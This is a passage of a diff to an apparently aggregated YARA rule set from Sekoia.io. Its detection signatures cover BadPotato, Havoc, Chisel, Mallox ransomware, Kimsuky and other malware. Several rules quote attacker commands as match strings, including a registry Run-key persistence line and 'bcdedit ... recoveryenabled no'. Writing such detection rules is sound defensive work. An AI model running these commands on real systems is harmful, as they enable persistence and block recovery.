+		description = "Detects BadPotato compiled exploit"
 		author = "Sekoia.io"
-		id = "ccfe0593-0a9f-4369-952e-5cef2f459bb3"
-		date = "2022-12-01"
+		id = "079aabbc-6978-4d71-92d2-d2a7ce1cc915"
+		date = "2022-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/launcher_win_bluehaze.yar#L4-L35"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "56a9d6d713a5744e77c8d34ad28983bb3b2aded1abff47dbf2d887724bd3ed4e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_exploit_badpotato_strings.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a45935ea5877a4b81468cbe0e1a4a7232b955771442f84bb3b88b7992ed23937"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238099,25 +238969,28 @@ rule SEKOIA_Launcher_Win_Bluehaze : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Libraries\\CNNUDTV"
-		$ = "cmd.exe /C wuwebv.exe -t -e"
-		$ = "cmd.exe /C reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v ACNTV /t REG_SZ /d \"Rundll32.exe SHELL32.DLL,ShellExec_RunDLL"
+		$ = "RpcStringBindingCompose failed with status 0x" wide
+		$ = "RpcBindingFromStringBinding failed with status 0x" wide
+		$ = "RpcBindingSetAuthInfoEx failed with status 0x" wide
+		$ = "RpcBindingSetOption failed with status 0x" wide
+		$ = "\\\\.\\pipe\\{0}\\pipe\\spoolss" wide
+		$ = "[*] {0} Success! ProcessPid:{1}" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of them or pe.imphash ( ) == "1b3d8fae6035e34f91baa59643746efe" or hash.md5 ( pe.rich_signature.clear_data ) == "44022b7cefeae4d55edcceb5b9bcd295" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "1cdcb493593f8793b10e109f6b5b2993" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "276d668ed7d1b46e101425e02a16460f" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f6a474220add335b5696256235ce8c9c" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "82bccb3330d50080f86ab1aa566cae8e" )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 5 of them
 }
-rule SEKOIA_Tool_Revsocks_Strings : FILE
+rule SEKOIA_Malware_Sugargh0St_Strings : FILE
 {
 	meta:
-		description = "Detects revsocks client"
+		description = "Detects SugarGh0st based on strings"
 		author = "Sekoia.io"
-		id = "f5f34e74-0795-4c81-a385-218a8197a0b7"
-		date = "2024-03-07"
+		id = "51930498-b04a-4f13-8d14-ee975a28126e"
+		date = "2023-12-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_revsocks_strings.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f1702aaaebc1ba720f688f0694a69fef55a2556b1f07dd4b846be1ae32ff5529"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/malware_sugargh0st_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b878b5d3b3f62952d79c0ea5811838f4e79302b85f25494e91dc730dec8e1d8d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238125,27 +238998,26 @@ rule SEKOIA_Tool_Revsocks_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "reverse socks5 server/client by kost" ascii fullword
-		$ = "github.com/kost/"
-		$ = "revsocks -listen"
-		$ = "Start on the DNS server: revsocks -dns"
-		$ = "crypto/aes."
+		$ = "%sd.%s /c \"%s\"" wide
+		$ = "[Num Lock]" wide
+		$ = "#32770" wide
+		$ = "]%s (%4d-%02d-%02d %02d:%02d:%02d)" wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xcafebabe or uint32be( 0 ) == 0xCFFAEDFE ) and 3 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 100KB and all of them
 }
-rule SEKOIA_Backdoor_Opensource_Northstar_Strings : FILE
+rule SEKOIA_Implant_Win_Havoc_Default_Strings : FILE
 {
 	meta:
-		description = "Detects the NorthStar Backdoor strings"
+		description = "Finds Havoc implants based on the embedded default strings"
 		author = "Sekoia.io"
-		id = "6bf2f428-ec1a-4115-9c5e-258e9176969a"
-		date = "2022-08-23"
+		id = "955c2211-4502-4258-ba4c-0d96a5624283"
+		date = "2022-10-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_opensource_northstar_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c4cf8935137c1420106807240de7583ca8f5c0b231f51bba279aedf672e25274"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_win_havoc_default_strings.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "dbf17e579071f265961657d73c6a2e51630b23e80376491df2e631cee5ffb1b4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238153,28 +239025,31 @@ rule SEKOIA_Backdoor_Opensource_Northstar_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "_SAMDUMP.zip" wide
-		$ = "northstar" wide
-		$ = "smanage.php?sid=" wide
-		$ = "File Not Exists" wide
-		$ = "<enablecmd or enable cmd>" wide
-		$ = "getjuice.php" wide
+		$str01 = "C:\\Windows\\System32\\notepad.exe" ascii
+		$str02 = "C:\\Windows\\SysWOW64\\notepad.exe" ascii
+		$str03 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" ascii
+		$str04 = "POST" wide
+		$str05 = "\\??\\C:\\Windows\\System32\\ntdll.dll" wide
+		$str06 = "X-Havoc: true" ascii
+		$str07 = "X-Havoc-Agent: Demon" ascii
+		$str08 = "/text.gif" ascii
+		$str09 = "SeImpersonatePrivilege" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 6 of them
+		uint16( 0 ) == 0x5A4D and 6 of them
 }
-rule SEKOIA_Hacktool_Nbtscan_Strings : FILE
+rule SEKOIA_Tool_Chisel_Strings : FILE
 {
 	meta:
-		description = "Detects NBTScan hacktool based on strings, ELF & PE variants"
+		description = "Detects Chisel"
 		author = "Sekoia.io"
-		id = "8883b56c-a085-459c-9ec6-a139ad5a2671"
-		date = "2022-02-06"
+		id = "667a8aa3-772b-45f1-8c89-acb7b976888d"
+		date = "2024-03-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_nbtscan_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "87e4f5dd16ee29dfd23b70dccbc41b0ef40c2db28f42fbd7fd84e5e93ca5c943"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_chisel_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "fe389d9d0ae73c79f1040274e21135d4df645c5ac672fc824923f0a5a085be8a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238182,29 +239057,29 @@ rule SEKOIA_Hacktool_Nbtscan_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "CHT:nfp:bt:vw:mVO:1P"
-		$ = "usage: %s [options] target [targets...]"
-		$ = "Targets are lists of IP addresses, DNS names, or address"
-		$ = "net bits [%d] must be 1..32"
-		$ = "subnet /%d is too large (%d max)"
-		$ = "[%s] is invalid IP address"
-		$ = "[%s] is an invalid target (bad IP/hostname)"
+		$ = "tunnel.(*Tunnel).handleSSHChannel."
+		$ = "server.(*Server).handleWebsocket"
+		$ = "tunnel.(*udpHandler)"
+		$ = "server.(*Server).tlsLetsEncrypt"
+		$ = "cnet.(*wsConn).SetPingHandler.(*Conn)"
+		$ = "tunnel.(*udpConns).dial."
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 5 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 15MB and 3 of them
 }
-rule SEKOIA_Hacktool_Earthworm_Strings : FILE
+
+rule SEKOIA_Hacktool_Win_Gmer : FILE
 {
 	meta:
-		description = "Detects Mac/Win/Linux EarthWorm based on strings"
+		description = "Dtect the GMER hacktool based string and UPX usage"
 		author = "Sekoia.io"
-		id = "6c9b0225-8c41-49f9-9745-245bc7ef942f"
-		date = "2022-02-08"
+		id = "d2f1aba1-4222-45e5-95bd-4d7f08595cea"
+		date = "2022-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_earthworm_strings.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0460c62fefc3d594ca758a37fbe1716182ffdca2920fedd32a707f7117702176"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_win_gmer.yar#L3-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "dbd4e97c343dcb14c6e814afa820a9fbb5aa4290c7ddf9d864029bb35bb96dbf"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238212,143 +239087,130 @@ rule SEKOIA_Hacktool_Earthworm_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "the read url is %s"
-		$ = "--> %3d <-- (close)used tunnel %d , unused tunnel %d"
-		$ = "ssocksd 0.0.0.0:%d <--[%4d usec]--> socks server"
-		$ = "could not create one way tunnel"
+		$pac = "IDI_GMER" wide
+		$str0 = "---- Processes - GMER %s ----" ascii
+		$str1 = "E:\\projects\\cpp\\gmer\\Release\\gmer.pdb" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xcffaedfe ) and filesize < 100KB and 3 of them
+		uint16( 0 ) == 0x5A4D and ( ( $pac and for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == "UPX0" ) ) or any of ( $str* ) ) and filesize < 900KB
 }
-rule SEKOIA_Apt_Muddywater_Powershell_Reverse_Secure_Proxy
+rule SEKOIA_Ta410_Control_Flow_Obfuscation : FILE
 {
 	meta:
-		description = "Detects PowerShell Reverse Secure Proxy"
+		description = "Detects control flow obfuscation used by TA410 in XXXModule_dlcore0"
 		author = "Sekoia.io"
-		id = "b255f327-cb56-41b7-82f7-83ee23f791a5"
-		date = "2023-11-14"
+		id = "2a784f9b-3624-4c5d-8a64-db7d3c33a8f7"
+		date = "2022-10-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_muddywater_powershell_reverse_secure_proxy.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6507bc030d60af5559492bbb02bc619646306ab06c9bd9d3f78ae6ce55307bda"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ta410_control_flow_obfuscation.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "6cf78943728286d0bddd99049d81065673ab7f679029cdd5f5dc69f90197136e"
+		logic_hash = "3ee6ee07e7a7be285290ec91de649afff3e5dc222bcfc58709b642d4dd53dc41"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$CS.Read($buff,4,2) | Out-Null" ascii wide
-		$ = "$DP = $buff[2]*256 + $buff[3]" ascii wide
-		$ = "$PS3.BeginInvoke() | Out-Null" ascii wide
+		$chunk_1 = {
+        E8 ?? ?? ?? ??
+        83 C0 10
+        3D 00 00 00 80
+        7D 01
+        EB ff
+        }
+		$chunk_2 = {83 C0 10 3D 00 00 00 80 7d 01 eb ff e0 50 c3 75}
 
 	condition:
-		all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 10MB and any of them
 }
-rule SEKOIA_Tool_Execit_Obfuscator_Strings : FILE
+rule SEKOIA_Ransomware_Mallox : FILE
 {
 	meta:
-		description = "Detects ExecIT Dlls"
+		description = "Rule to detect mallox ransomware samples."
 		author = "Sekoia.io"
-		id = "59eaeb20-150b-41a4-b866-1c91a07623ac"
-		date = "2024-09-11"
+		id = "7e2edc94-26e4-4024-8bc0-8e90d76f5a96"
+		date = "2023-02-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_execit_obfuscator_strings.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "1c185e2e11d8eadccfb130766ca30d85"
-		hash = "a0898f57f2b139ea278d8a7e97bbe358"
-		hash = "e0e12a8891f5585ce1ad55dbffb4f9c2"
-		hash = "d4102676d536bacffcf6c94364e26828"
-		logic_hash = "cd8edbe9c6cb7dcde56860e0ff47f4496b36848f46a89f6945b7762f86ff5e59"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_mallox.yar#L1-L38"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c9300de42ee9eb3e820f49aa979234ff61c33dc6bf5d65bcb26e45b7126aafec"
 		score = 75
-		quality = 80
+		quality = 54
 		tags = "FILE"
 		version = "1.0"
+		modification_date = "2023-05-24"
 		classification = "TLP:CLEAR"
+		hash1 = "2a549489e2455a2d84295604e29c727dd20d65f5a874209840ce187c35d9a439"
+		hash2 = "3f843cbffeba010445dae2b171caaa99c6b56360de5407da71210d007fe26673"
+		hash3 = "4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6"
+		hash4 = "4db69a0643f6ec795e5450a0563605e91293f233aa60715ae09ed8effa3b7267"
+		hash5 = "77fdce66e7f909300e4493cbe7055254f7992ba65f9b7445a6755d0dbd9f80a5"
+		hash6 = "8e974a3be94b7748f7971f278160a74d738d5cab2c3088b1492cfbbd05e83e22"
+		hash7 = "a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525"
+		hash8 = "df64e87ecb30f4cadf54f2c1b3d3cba8cc2d315db0fd4af2d11add57baa56f6a"
+		hash9 = "e7e00e0f817fcb305f82aec2e60045fcdb1b334b2621c09133b6b81284002009"
 
 	strings:
-		$ = "yromeMlautriVetacollAtN"
-		$ = "xEdaerhTetaerCtN"
-		$ = "tcejbOelgniSroFtiaWtN"
-		$ = "lld.esablenrek"
-		$ = "txetnoCdaerhTteG"
-		$ = "txetnoCdaerhTteS"
-		$ = "cef_api_hash"
-		$ = "cef_execute_process"
-		$ = "cef_get_path"
+		$s1 = "C:\\HOW TO RECOVER !!.TXT" wide ascii nocase
+		$s2 = "SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\Raccine" wide ascii nocase
+		$s3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\vssadmin.exe" wide ascii nocase
+		$s4 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\wmic.exe" wide ascii nocase
+		$s5 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\wbadmin.exe" wide ascii nocase
+		$s6 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\bcdedit.exe" wide ascii nocase
+		$s7 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\powershell.exe" wide ascii nocase
+		$s8 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\diskshadow.exe" wide ascii nocase
+		$s9 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\net.exe" wide ascii nocase
+		$s10 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskkill.exe" wide ascii nocase
+		$s11 = "bcdedit /set {current} recoveryenabled no" wide ascii nocase
+		$mallox_fargo = ".FARGO" wide ascii nocase
+		$mallox_mallox = ".mallox" wide ascii nocase
+		$mallox_exploit = "newexploit@tutanota.com"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 5 of them
+		uint16be( 0 ) == 0x4d5a and all of ( $s* ) and 1 of ( $mallox_* )
 }
-rule SEKOIA_Apt_Cloudatlas_Stagescalldllmainafterexec
+rule SEKOIA_Apt_Kimsuky_Sharptongue_Vbslauncher_Strings : FILE
 {
 	meta:
-		description = "Detects call to dllmain after execution of exported function"
+		description = "Detects VBS Launchers used by SharpTongue"
 		author = "Sekoia.io"
-		id = "a24b7887-87f6-44e3-80c5-cd117e694595"
-		date = "2023-10-31"
+		id = "82bd648c-2961-4945-950e-8fb1e4650338"
+		date = "2022-07-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_cloudatlas_stagescalldllmainafterexec.yar#L1-L46"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6d1c1717b4012e72b0069068158265dfd215cd7685a5489aba3de4a9024bfa28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_sharptongue_vbslauncher_strings.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9e1383a71b4ab5ca1de5016061f0e9c83e6f3e1a41eef25dae15cd1aab8b581f"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk_1 = {
-        55
-        8B EC
-        83 EC 10
-        C7 45 ?? 00 00 00 00
-        83 7D ?? 00
-        74 ??
-        8B 45 ??
-        89 45 ??
-        8B 4D ??
-        8B 51 ??
-        03 55 ??
-        89 55 ??
-        8B 45 ??
-        8B 48 ??
-        03 4D ??
-        89 4D ??
-        6A 00
-        6A 00
-        FF 75 ??
-        FF 55 ??
-        68 00 80 00 00
-        6A 00
-        8B 55 ??
-        52
-        FF 15 ?? ?? ?? ??
-        C7 45 ?? 01 00 00 00
-        8B 45 ??
-        8B E5
-        5D
-        C2 04 00
-        }
+		$ = "powershell" ascii wide
+		$ = "On Error Resume Next" ascii wide
+		$ = "oShell.run(tmp0,0" ascii wide
 
 	condition:
-		any of them
+		all of them and filesize < 10KB
 }
-rule SEKOIA_Apt_Ir_Sugarush_Implant : FILE
+rule SEKOIA_Infostealer_Win_Nosu : FILE
 {
 	meta:
-		description = "Detects the SUGARUSH implant"
+		description = "Finds Nosu samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "bcf057cc-272c-4cb6-bb76-928788675282"
-		date = "2022-08-23"
+		id = "9823af25-e30b-4514-a59c-02dd19fe368d"
+		date = "2022-12-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_ir_sugarush_implant.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0d249552013c29ce1eb66dca2d93e5cde0a1b0fb80aae55469bec3bda224be91"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_nosu.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f18db2008aa9175fc423133fd6d5872c5750d011aad73c373505347443d5032c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238356,68 +239218,52 @@ rule SEKOIA_Apt_Ir_Sugarush_Implant : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "You are offline at " wide
-		$ = "\\Logs\\ServiceLog_" wide
-		$ = "Service is recall at" wide
-		$ = "add_OutputDataReceived" ascii
-		$ = "get_CurrentDomain" ascii
+		$str0 = "C:\\xampp\\htdocs\\nosu\\core\\release\\lilly.pdb" ascii
+		$str1 = "{\"gp\":\"%s\",\"app\":\"%S\"," ascii
+		$str2 = "stored in zip:\\%s" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 100KB and all of them
+		uint16( 0 ) == 0x5A4D and 1 of them and filesize < 1MB
 }
-rule SEKOIA_Backdoor_Win_Volgmer : FILE
+rule SEKOIA_Apt_Konni_Dropper : FILE
 {
 	meta:
-		description = "Detect the NukeSped variant called Volgmer used by Andariel"
+		description = "Detects Konni dropper used when distributed via malicious document"
 		author = "Sekoia.io"
-		id = "9468a66d-787c-488f-937b-22617c7a2ded"
-		date = "2023-09-04"
+		id = "0783a55e-1d1e-40ca-a661-2c5dec6d78d6"
+		date = "2023-11-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_volgmer.yar#L1-L32"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "700fcfcc3df1d81af99db38e305f64ca87f8368fc0149c9ad64d75c2917ec1f3"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_konni_dropper.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6d1b1f5ccbdc20908891e5f40ceb85c251b1ca2a395fa4b106e63718c6393a22"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "3098e6e7ae23b3b8637677da7bfc0ba720e557e6df71fa54a8ef1579b6746061"
-		hash2 = "7339cfa5a67f5a4261c18839ef971d7f96eaf60a46190cab590b439c71c4742b"
-		hash3 = "8daa6b20caf4bf384cc7912a73f243ce6e2f07a5cb3b3e95303db931c3fe339f"
-		hash4 = "1b88b939e5ec186b2d19aec8f17792d493d74dd6ab3d5a6ddc42bfe78b01aff1"
 
 	strings:
-		$ = "Fixed" wide
-		$ = "CDRom" wide
-		$ = "Removable" wide
-		$ = "%.2fGB" wide
-		$ = "\\*.*" wide
-		$ = "Folder" wide
-		$ = "%.1fKB" wide
-		$ = "%.1fMB" wide
-		$ = "%s\\*.*" wide
-		$ = "%s\\%s\\%s" wide
-		$ = "%s\\%s%s" wide
-		$ = "Remote PC" wide
-		$ = "%s|%s|%s|%s|%s|%s|" wide
-		$ = "%s\\cmd.exe" wide
+		$ = "UnzipAFile"
+		$ = "check.bat"
+		$ = "FOF_SILENT"
+		$ = "fLieObj"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		filesize < 1MB and 3 of them
 }
-rule SEKOIA_Apt_Kimsuky_Malicious_Gotopwsh_Lnk : FILE
+rule SEKOIA_Backdoor_Opensource_Northstar_Strings : FILE
 {
 	meta:
-		description = "Detects malicious LNK used by Kimsuky"
+		description = "Detects the NorthStar Backdoor strings"
 		author = "Sekoia.io"
-		id = "cfe9adf5-2c06-4d04-8006-c4eea0dab549"
-		date = "2023-09-11"
+		id = "6bf2f428-ec1a-4115-9c5e-258e9176969a"
+		date = "2022-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_malicious_gotopwsh_lnk.yar#L1-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "1537ea232e745b1ed9e4b7f6b9ba779a3498f5edf0c46bdccfdc511137b2bb3a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_opensource_northstar_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c4cf8935137c1420106807240de7583ca8f5c0b231f51bba279aedf672e25274"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238425,23 +239271,29 @@ rule SEKOIA_Apt_Kimsuky_Malicious_Gotopwsh_Lnk : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = {67 00 6f 00 74 00 6f 00 26 00 70 00 5e 00 6f 00 77 00 5e 00 65 00 5e 00 72 00 73 00 5e 00 68 00 65 00 5e 00 6c 00 5e 00 6c}
+		$ = "_SAMDUMP.zip" wide
+		$ = "northstar" wide
+		$ = "smanage.php?sid=" wide
+		$ = "File Not Exists" wide
+		$ = "<enablecmd or enable cmd>" wide
+		$ = "getjuice.php" wide
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and all of them
+		uint16be( 0 ) == 0x4d5a and 6 of them
 }
-rule SEKOIA_Infostealer_Win_Vulturi : FILE
+rule SEKOIA_Apt_Lazarus_Backdoored_Jslib : FILE
 {
 	meta:
-		description = "Detect the Vulturi infostealer based on specific strings"
+		description = "Detects InvisibleFerret based on common ressource."
 		author = "Sekoia.io"
-		id = "5369cbfb-ff94-4484-b5a4-894feeed97e1"
-		date = "2022-03-14"
+		id = "73ffd449-93c8-494e-9c14-2e933b21a200"
+		date = "2024-10-28"
 		modified = "2024-12-19"
-		reference = "https://lamp-ret.club/t/vulturi-cracked-by-tr0uble-and-eshelon_mayskih.193/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_vulturi.yar#L1-L35"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "2d442768499ea0d4b6f5ac0d85521d73bb8337a53f1641485b0ce0054e2dc91c"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_lazarus_backdoored_jslib.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "52e92be527690f4e63608cbc699e2f70"
+		logic_hash = "205ad321afcb22ae2bf6cf2a58ce970ea9b0edda7fab60ddeda5ea36ecfe3cb9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238449,41 +239301,25 @@ rule SEKOIA_Infostealer_Win_Vulturi : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$vul = "Vulturi_" ascii
